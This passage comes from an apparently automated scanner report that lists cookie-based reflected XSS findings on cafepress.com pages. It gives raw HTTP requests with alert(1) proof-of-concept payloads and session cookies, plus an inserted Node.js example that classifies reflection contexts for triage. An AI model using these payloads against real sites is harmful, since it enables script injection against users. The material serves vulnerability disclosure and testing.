1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-ipad-case
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db02"-alert(1)-"9bd63bb7d30 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 55461 Date: Sun, 26 Dec 2010 13:48:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-ipad-case
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc4d</script><script>alert(1)</script>d48aac4b022 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ccc4d</script><script>alert(1)</script>d48aac4b022 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 55481 Date: Sun, 26 Dec 2010 13:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55481 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'ccc4d</script><script>alert(1)</script>d48aac4b022 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-iphone-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51aff"-alert(1)-"90ad1b3827e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 57100 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57100 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-iphone-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c70c</script><script>alert(1)</script>36986f285d4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=3c70c</script><script>alert(1)</script>36986f285d4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 57121 Date: Sun, 26 Dec 2010 13:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57121 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '3c70c</script><script>alert(1)</script>36986f285d4 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
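The following is an added worked example; it is not part of the XSS.CX report and not code from cafepress.com. It reproduces, offline in Node.js, the judgement the scanner makes for each finding above: given a response body and the marker that was submitted, it decides whether the marker was reflected inside a script element, which JavaScript string quote (if any) encloses it at that point, and which break-out the payload achieves there. The two response fragments it runs on are constructed to mirror the two sinks seen in this report (the single-quoted window.cafepress.tealeaf.searchTerm assignment and the double-quoted s.eVar30 assignment); they are not captured traffic, and the function names are the example's own.

```javascript
// Added example (not from the XSS.CX report or the cafepress.com code base):
// reproduce the scanner's context judgement for a reflected marker offline.

// Quote state of a JavaScript fragment at its end: "'" or '"' if the fragment
// ends inside a string literal, otherwise null. Handles backslash escapes and
// skips // and /* */ comments; regex and template literals are out of scope.
function openQuote(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote) {
      if (c === '\\') i++;                 // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '/' && js[i + 1] === '/') {
      const nl = js.indexOf('\n', i);
      i = nl < 0 ? js.length : nl;
    } else if (c === '/' && js[i + 1] === '*') {
      const end = js.indexOf('*/', i + 2);
      i = end < 0 ? js.length : end + 1;
    } else if (c === '"' || c === "'") {
      quote = c;
    }
  }
  return quote;
}

// Locate the first occurrence of `marker` in `body` and describe its context:
// plain HTML, JavaScript code, or a single-/double-quoted JavaScript string,
// plus the break-outs the marker achieves in that context.
function classifyReflection(body, marker) {
  const idx = body.indexOf(marker);
  if (idx < 0) return { reflected: false, context: null, breakouts: [] };

  const before = body.slice(0, idx);
  const lower = before.toLowerCase();
  const lastOpen = lower.lastIndexOf('<script');
  const lastClose = lower.lastIndexOf('</script');
  if (lastOpen < 0 || lastClose > lastOpen) {
    return { reflected: true, context: 'html', breakouts: [] };
  }

  // JavaScript text between the end of the opening <script ...> tag and the marker.
  const js = before.slice(before.indexOf('>', lastOpen) + 1);
  const quote = openQuote(js);
  const breakouts = [];
  if (marker.toLowerCase().includes('</script')) {
    breakouts.push('</script> terminates the script element');
  }
  if (quote && marker.includes(quote)) {
    breakouts.push('unescaped ' + quote + ' terminates the string literal');
  }
  const context = quote === "'" ? 'js-string-single'
                : quote === '"' ? 'js-string-double'
                : 'js-code';
  return { reflected: true, context, breakouts };
}

// Constructed markers and response fragments modelled on the two sinks in
// this report; they are not captured traffic.
const CP_ST_MARKER = '3c70c</script><script>alert(1)</script>36986f285d4';
const CP_V_MARKER = '46ce6"-alert(1)-"366e3ae2b93';

const TEALEAF_PAGE =
  '<html><head><script type="text/javascript">\n' +
  'window.cafepress = window.cafepress || {};\n' +
  'window.cafepress.tealeaf = {};\n' +
  "window.cafepress.tealeaf.pageLandingType = 'Make'\n" +
  "window.cafepress.tealeaf.searchTerm = '" + CP_ST_MARKER + " '\n" +
  "window.cafepress.tealeaf.salesChannel = 'Make'\n" +
  '</script></head><body></body></html>';

const OMNITURE_PAGE =
  '<html><head><script type="text/javascript">\n' +
  'var s = {}; // constructed stand-in for the analytics object\n' +
  's.eVar30 = "VISITORHASH:COOKIEVALUE' + CP_V_MARKER + ' ";\n' +
  's.eVar26 = "";\n' +
  '</script></head><body></body></html>';

// A correctly encoded rendering: the raw marker is absent, so nothing is reported.
const ENCODED_PAGE =
  "<script>window.cafepress.tealeaf.searchTerm = '3c70c\\u003c/script\\u003e...'</script>";

console.log(JSON.stringify(classifyReflection(TEALEAF_PAGE, CP_ST_MARKER)));
console.log(JSON.stringify(classifyReflection(OMNITURE_PAGE, CP_V_MARKER)));
console.log(JSON.stringify(classifyReflection(ENCODED_PAGE, CP_ST_MARKER)));
```

Run with node; the first result reports a single-quoted string context whose only break-out is the </script> sequence (the cp_st payload contains no quote at all), the second a double-quoted string context broken by the bare double quote, and the third no reflection. The quote tracker deliberately stops at what a triage script needs; for a full-fidelity answer one would hand the response to a real HTML tokenizer and JavaScript parser.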
1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-mugs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46ce6"-alert(1)-"366e3ae2b93 was submitted in the cp-v cookie, appended to the existing cookie value. This input was echoed unmodified in the application's response: in the response below it appears inside the double-quoted s.eVar30 analytics assignment, where the embedded double quote terminates the string literal and the remainder is parsed as JavaScript. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
